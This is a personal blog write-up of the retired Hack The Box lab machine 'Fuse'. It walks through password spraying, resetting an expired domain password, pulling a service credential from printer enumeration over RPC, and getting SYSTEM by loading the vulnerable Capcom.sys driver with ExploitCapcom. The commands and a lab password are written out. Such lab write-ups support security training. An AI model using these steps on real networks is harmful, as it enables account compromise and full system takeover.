Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Fuse
|htbmachinesretired|

Summary

Fuse is a Windows, medium box is a created by egre55. Initial foothold was exploiting a corporation automatic printer install process and finding an expire credential for an user,after resetting the password we can do rpc Enumeration which give us credential for the printer service using which we can get a shell on the box. Checking Printer service permission we see it can load drivers so we create a malicious driver to get privilege escalation on the box.

Initial Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
# Nmap 7.80 scan initiated Sun Aug 30 08:55:56 2020 as: nmap -sC -sV -oN nmap/fuse 10.10.10.193
Nmap scan report for 10.10.10.193
Host is up (0.078s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-08-30 03:39:11Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/30%Time=5F4B1C55%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m02s, deviation: 4h02m29s, median: 13m02s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-08-29T20:41:29-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-08-30T03:41:32
|_  start_date: 2020-08-29T14:55:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 30 09:01:06 2020 -- 1 IP address (1 host up) scanned in 309.93 seconds

Web (Port: 80)

Visiting the site on http://10.10.10.193 redirect us to http://fuse.fabricorp.local/

Enumerating the web page we find some usernames

1
2
3
4
5
pmerton
tlavel
sthompson
bhult
administrator

As we have usernames lets cewl for passwords maybe.
using

1
cewl -d 5 -m 3 -w wordlist-withNumbers http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers

SMB

Password Spraying on smb using crackmapexec we get for tlavel we have a hit with a message to change the password with password as Fabricorp01

So lets use smbpasswd to change the password

1
2
3
4
5
smbpasswd -r 10.10.10.193 -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on 10.10.10.193.

getting a rpcclient and enumerating we can get all the users using enumdomusers

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]

and checking enumprinters we get a new password $fab@s3Rv1ce$1

This was the part I hate the most about this box as password keep reseting back.

Lets password spray again and see if we find any valid login with this password.

Shell (svc-print)

1
2
3
4
5
6
7
8
crackmapexec winrm 10.10.10.193 -u loot/users.list  -p '$fab@s3Rv1ce$1'
WINRM       10.10.10.193    5985   FUSE             [*] http://10.10.10.193:5985/wsman
WINRM       10.10.10.193    5985   FUSE             [-] FABRICORP\pmerton:$fab@s3Rv1ce$1 "Failed to authenticate the user pmerton with ntlm"
WINRM       10.10.10.193    5985   FUSE             [-] FABRICORP\tlavel:$fab@s3Rv1ce$1 "Failed to authenticate the user tlavel with ntlm"
WINRM       10.10.10.193    5985   FUSE             [-] FABRICORP\sthompson:$fab@s3Rv1ce$1 "Failed to authenticate the user sthompson with ntlm"
WINRM       10.10.10.193    5985   FUSE             [-] FABRICORP\bhult:$fab@s3Rv1ce$1 "Failed to authenticate the user bhult with ntlm"
WINRM       10.10.10.193    5985   FUSE             [-] FABRICORP\administrator:$fab@s3Rv1ce$1 "Failed to authenticate the user administrator with ntlm"
WINRM       10.10.10.193    5985   FUSE             [+] FABRICORP\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)

give us a cred to be used on winrm to get a shell

Privilege Escalation

checking whoami /all to see any intresting group

1
2
3
4
5
6
7
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Googling about Abusing any of the Privilege we find we can Abuse SeLoadDriverPrivilege

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/

After lot of Google-fu
I got Capcom.sys and ExploitCapcom

I did that because i didn’t wanted to compile it locally.

uploading those files

And running these command to load and exploit

1
2
.\ExploitCapcom.exe LOAD C:\Windows\System32\spool\drivers\color\Capcom.sys
.\ExploitCapcom.exe EXPLOIT whoami

We see we can execute command as nt authority\system

I uploaded an metasploit shell and executed it with

1
.\ExploitCapcom.exe EXPLOIT shell.exe

to get a shell

and we can read root.txt

and we have pwned Fuse 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/fuse/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
writeupretiredhacktheboxmediumwindowsprintermalicious-driver